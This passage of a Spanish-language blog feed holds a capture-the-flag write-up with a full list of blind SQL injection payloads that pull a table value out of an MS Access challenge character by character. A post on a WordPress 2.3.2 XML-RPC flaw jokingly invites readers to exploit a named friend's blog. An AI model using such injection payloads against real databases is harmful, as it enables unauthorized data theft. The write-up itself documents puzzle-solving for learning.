La Tabla se llama garrupito, el único Atributo se llama Valor, solo hay 1 fila y el valor de esta fila tiene un largo de 36.</p>
<p>Ya teniendo todo esto la siguiente parte era dedicarme a crear una inyección donde pueda ir probando carácter por carácter que valor correspondía para así obtener el contenido de la fila a través de la inyección, la hoja de trucos para MS Access nos sugería una pero desgraciadamente el gestor MS Access de BDs no es sensible a las mayúsculas haciendo que A y a sean iguales, sin embargo esto no me impidió elaborar una solución/query:<br />
2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, X, 1)) FROM garrupito) = Y, 1, 0)<br />
Como puede notarse en la inyección<br />
X = El Numero del carácter que se esta probando, los cuales para el reto de chema iban desde el 1 hasta el 36<br />
Y = Es el valor en ascii a probar los cuales.<br />
Viendo obviamente todo el trabajo que iba a necesitar se me dio por diseñar una aplicación que lo haga por mi, sin embargo esta misma no la pude acabar primero por que todos mis intentos fueron fallidos y segundo por que mientras hacia esta aplicacion, dos usuarios me rebasaron y acabaron el reto, así que por temor a que otros usuarios me rebasen preferí hacerlo a mano así que a continuación les dejo todas las inyecciones SQL que me resultaron positivas para sacar el valor de la fila:</p>
<p>9 = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 1, 1)) FROM garrupito) = 57, 1, 0)<br />
D = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 2, 1)) FROM garrupito) = 68, 1, 0)<br />
B = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 3, 1)) FROM garrupito) = 66, 1, 0)<br />
7 = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 4, 1)) FROM garrupito) = 55, 1, 0)<br />
D = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 5, 1)) FROM garrupito) = 68, 1, 0)<br />
1 = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 6, 1)) FROM garrupito) = 49, 1, 0)<br />
5 = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 7, 1)) FROM garrupito) = 53, 1, 0)<br />
7 = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 8, 1)) FROM garrupito) = 55, 1, 0)<br />
- = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 9, 1)) FROM garrupito) = 45, 1, 0)<br />
C = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 10, 1)) FROM garrupito) = 67, 1, 0)<br />
D = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 11, 1)) FROM garrupito) = 68, 1, 0)<br />
6 = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 12, 1)) FROM garrupito) = 54, 1, 0)<br />
8 = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 13, 1)) FROM garrupito) = 56, 1, 0)<br />
- = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 14, 1)) FROM garrupito) = 45, 1, 0)<br />
4 = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 15, 1)) FROM garrupito) = 52, 1, 0)<br />
2 = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 16, 1)) FROM garrupito) = 50, 1, 0)<br />
a = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 17, 1)) FROM garrupito) = 97, 1, 0)<br />
3 = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 18, 1)) FROM garrupito) = 51, 1, 0)<br />
- = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 19, 1)) FROM garrupito) = 45, 1, 0)<br />
A = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 20, 1)) FROM garrupito) = 65, 1, 0)<br />
3 = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 21, 1)) FROM garrupito) = 51, 1, 0)<br />
6 = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 22, 1)) FROM garrupito) = 54, 1, 0)<br />
6 = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 23, 1)) FROM garrupito) = 54, 1, 0)<br />
- = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 24, 1)) FROM garrupito) = 45, 1, 0)<br />
C = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 25, 1)) FROM garrupito) = 67, 1, 0)<br />
3 = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 26, 1)) FROM garrupito) = 51, 1, 0)<br />
2 = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 27, 1)) FROM garrupito) = 50, 1, 0)<br />
B = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 28, 1)) FROM garrupito) = 66, 1, 0)<br />
E = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 29, 1)) FROM garrupito) = 69, 1, 0)<br />
3 = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 30, 1)) FROM garrupito) = 51, 1, 0)<br />
7 = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 31, 1)) FROM garrupito) = 55, 1, 0)<br />
7 = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 32, 1)) FROM garrupito) = 55, 1, 0)<br />
D = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 33, 1)) FROM garrupito) = 68, 1, 0)<br />
F = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 34, 1)) FROM garrupito) = 70, 1, 0)<br />
6 = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 35, 1)) FROM garrupito) = 54, 1, 0)<br />
D = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 36, 1)) FROM garrupito) = 68, 1, 0)</p>
<p>Ya juntos todos estos caracteres formaban: 9DB7D157-CD68-42a3-A366-C32BE377DF6D, cadena que correspondía a la respuesta del examen; sin embargo ami me paso algo curioso al ingresar esta respuesta el sistema me pateo (tal vez por que era la convocatoria de septiembre) así que se me ocurrió que era un hash o algo raro y empece a hacer nuevamente teorías locas sobre hashes y pues fue de pura suerte que halla realmente vuelto a intentar poner la respuesta y ahora si me acepte y pase a la siguiente y ultima parte.</p>
<p><strong>Segunda Parte</strong><br />
Aunque por naturaleza tendamos a creer que estamos en algo mas difícil que lo anterior esta vez así no lo fue, cuando abres ya la siguiente parte de &#8220;Subir Nota&#8221; nos topamos con un texto que dice que tenemos tarea para casa, que contiene una liga hacia una imagen con un ejercicio de ajedrez, después de darle una mirada rápida te das cuenta que es imposible hacer mate 1 así que la cosa no iba por ahí.<br />
Al tener un PNG algo pesadito lo primero que se me ocurrió es: esteganografía, así que pensé: sera que el chema se hecho su propio algoritmo de esteganografía en PNG? googleando un poco nos salen algunas referencias sobre como hacer esto sin embargo después de probar estas ninguna me marco que tenia texto escondido dentro de la imagen así que nuevamente estuve a punto de tirar la toalla y esperar a los solucionarios&#8230; sin embargo esta vez de la nada se me ocurrió una idea espontanea algo loca, tal vez sacando una copia de la misma imagen al re codificarse este salgan los bytes que posiblemente estén modificados y así podría con estos juguetear y tal vez me salga un texto a medias o completo pero con ruido.<br />
Al realizar esto y hacer una comparación buscando las diferencias se veía claramente (mas bien horriblemente) el sobrante&#8230; increíblemente al final del PNG esta pegado un archivo RAR, pues el siguiente paso era simple, tomar ese archivo y crearlo.<br />
Como han de suponer chema para no hacérnosla tan fácil le puso clave al RAR, como todos lo primero que hice fue empezar a sacar mis utilidades para hacer fuerza bruta al fichero RAR pero antes de empezar decidí probar con palabras conocidas como rh6, chema, examen, tarea, notaextra, ajedrez, chess, &#8230; así hasta llegar a garrupito, el cual era la contraseña del RAR.<br />
Una vez abierto este mismo lo que quedaba era simplemente otra imagen que contenía el texto:<br />
&#8220;It&#8217;s imposible, It&#8217;s only possible in two steps&#8221;<br />
Que era la respuesta para subir de nota así que como podrán ver era la conjetura inicial que hicimos a la parte 2 del reto solo que en ingles.</p>
<p><strong>Concluyendo&#8230;</strong><br />
Como notaran la parte 2 es un chiste comparada con el trabajo y esfuerzo realizado en la parte 1, la verdad es que me encanto esta vez tener un poco de tiempo para participar en estos retos, ya que de estos tipos de retos son de los que aprendes mas, espero estar a la altura del siguiente y ahora si esta vez no preguntarle a román <img src="http://g30rg3x.com/wp-includes/js/tinymce/plugins/emotions/images/smiley-tongue-out.gif" alt="Tongue out" title="Tongue out" border="0" />.</p>
<p><strong>Enlaces</strong><br />
<a href="http://retohacking6.elladodelmal.com/">Reto Hacking VI (Chema)</a><br />
<a href="http://elladodelmal.blogspot.com/">Un informático en el lado del mal</a><br />
<a href="http://www.webapptest.org/ms-access-sql-injection-cheat-sheet-EN.html">MS Access SQL Injection Cheat Sheet</a></p>
]]></content:encoded>
			<wfw:commentRss>http://g30rg3x.com/solucion-al-reto-hacking-vi-retos-chema/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Zorras 0 - Chivas 2 (Clausura 2008)</title>
		<link>http://g30rg3x.com/zorras-0-chivas-2-clausura-2008/</link>
		<comments>http://g30rg3x.com/zorras-0-chivas-2-clausura-2008/#comments</comments>
		<pubDate>Tue, 12 Feb 2008 03:16:30 +0000</pubDate>
		<dc:creator>g30rg3_x</dc:creator>
		
		<category><![CDATA[Blog]]></category>

		<category><![CDATA[Fútbol]]></category>

		<category><![CDATA[2008]]></category>

		<category><![CDATA[atlas]]></category>

		<category><![CDATA[chaflas]]></category>

		<category><![CDATA[chivas]]></category>

		<category><![CDATA[clausura]]></category>

		<category><![CDATA[hijo]]></category>

		<category><![CDATA[papa]]></category>

		<category><![CDATA[zorras]]></category>

		<guid isPermaLink="false">http://g30rg3x.com/zorras-0-chivas-2-clausura-2008/</guid>
		<description><![CDATA[
Que mas se puede decir, ya son 4 señores, ya son 4&#8230; ya hasta pena me da decirles algo&#8230;
]]></description>
			<content:encoded><![CDATA[<p><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="425" height="355" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="src" value="http://www.youtube.com/v/rqxgj1Op9lk&amp;rel=1" /><embed type="application/x-shockwave-flash" width="425" height="355" src="http://www.youtube.com/v/rqxgj1Op9lk&amp;rel=1"></embed></object><br />
Que mas se puede decir, <a href="http://www.mediotiempo.com/fmf/primera/clausura_2008/antecedentes.php?id_partido=22387">ya son 4</a> señores, <a href="http://www.mediotiempo.com/fmf/primera/clausura_2008/antecedentes.php?id_partido=22387">ya son 4</a>&#8230; ya <a href="http://www.mediotiempo.com/fmf/primera/clausura_2008/galeria.php?id_partido=22387&amp;idi=19">hasta pena</a> me da decirles algo&#8230;</p>
]]></content:encoded>
			<wfw:commentRss>http://g30rg3x.com/zorras-0-chivas-2-clausura-2008/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Vulnerabilidad de Seguridad en WordPress 2.3.2</title>
		<link>http://g30rg3x.com/vulnerabilidad-de-seguridad-en-wordpress-232/</link>
		<comments>http://g30rg3x.com/vulnerabilidad-de-seguridad-en-wordpress-232/#comments</comments>
		<pubDate>Sun, 03 Feb 2008 05:55:55 +0000</pubDate>
		<dc:creator>g30rg3_x</dc:creator>
		
		<category><![CDATA[Hacking]]></category>

		<category><![CDATA[Seguridad]]></category>

		<category><![CDATA[WordPress]]></category>

		<guid isPermaLink="false">http://g30rg3x.com/vulnerabilidad-de-seguridad-en-wordpress-232/</guid>
		<description><![CDATA[Bueno aunque llego muy cansado de una extra jornada laboral ayudando a mi familia (en el por supuesto negocio familiar) y a pesar que el tiempo que tengo para estar online lo iba realmente a destinar para darle reto hacking 6 del buen chema (el cual me inscribí y le di su miradita rápida ayer [...]]]></description>
			<content:encoded><![CDATA[<p>Bueno aunque llego muy cansado de una extra jornada laboral ayudando a mi familia (en el por supuesto negocio familiar) y a pesar que el tiempo que tengo para estar online lo iba realmente a destinar para darle <a href="http://retohacking6.elladodelmal.com/">reto hacking 6</a> <a href="http://elladodelmal.blogspot.com/">del buen chema</a> (el cual me inscribí y le di su miradita rápida ayer por la noche)  pues lo decidí gastar en esta entrada.</p>
<p>Realmente me es extraño ver que nadie ha estado escribiendo sus notas alarmistas normales sobre el bug/vulnerabilidad, sobre todo cierto blog dedicado a la seguridad en blogs (me reservo el derecho de nombrarlo), pero en fin para no hacerla larga (como dije ando cansado) se ha descubierto un nuevo bug bajo el script que maneja el protocolo <a href="http://es.wikipedia.org/wiki/XML-RPC">XML-RPC</a> en WordPress, el cual permite que usuarios con pocos privilegios (suscriptores) cambiar el contenido de las entradas publicadas, aunque según los que la han podido probar, aunque si se logran editar las entradas estas quedan como borradores.<br />
Como de seguro ya notaron se requiere que el blog permita el registro de usuarios para obtener una cuenta de suscriptor y así explotar la vulnerabilidad algo que muy pocos blogs practican (el único blog cercano que conozco que tiene permitido esto es  el del <a href="http://michoacano.com.mx/">michoacano</a> -juaxors es su oportunidad, <a href="http://michoacano.com.mx/wp-login.php?action=register">denle con todo</a> a la michoaketa/julio <img src="http://g30rg3x.com/wp-includes/js/tinymce/plugins/emotions/images/smiley-tongue-out.gif" alt="Tongue out" title="Tongue out" border="0" />-) así que tampoco es una alarma grande pero si digamos es de los primeros bugs de seguridad que veo en la rama 2.3.x que tienen un poco de seriedad.</p>
<p>Las soluciones ya han sido dadas así que para los que las buscan aquí les dejo las ligas:<br />
<a href="http://trac.wordpress.org/changeset?old_path=%2Ftags%2F2.3.2%2Fxmlrpc.php&amp;new_path=%2Fbranches%2F2.3%2Fxmlrpc.php">Archivo de Diferencias</a> (<a href="http://trac.wordpress.org/changeset?format=diff&amp;new_path=branches%2F2.3%2Fxmlrpc.php&amp;old_path=tags%2F2.3.2%2Fxmlrpc.php">diff</a>)<br />
<a href="http://trac.wordpress.org/changeset?format=zip&amp;new_path=branches%2F2.3%2Fxmlrpc.php&amp;old_path=tags%2F2.3.2%2Fxmlrpc.php">Archivo Pre-Parcheado</a></p>
<p>Pueden encontrar mas información sobre la vulnerabilidad en:<br />
<a href="http://trac.wordpress.org/ticket/5313">http://trac.wordpress.org/ticket/5313</a><br />
<a href="http://www.theseekerblog.com/?p=284">http://www.theseekerblog.com/?p=284</a><br />
<a href="http://www.village-idiot.org/archives/2008/02/02/wordpress-232-exploit-confirmed/">http://www.village-idiot.org/archives/2008/02/02/wordpress-232-exploit-confirmed/</a></p>
]]></content:encoded>
			<wfw:commentRss>http://g30rg3x.com/vulnerabilidad-de-seguridad-en-wordpress-232/feed/</wfw:commentRss>
		</item>
	</channel>
</rss>
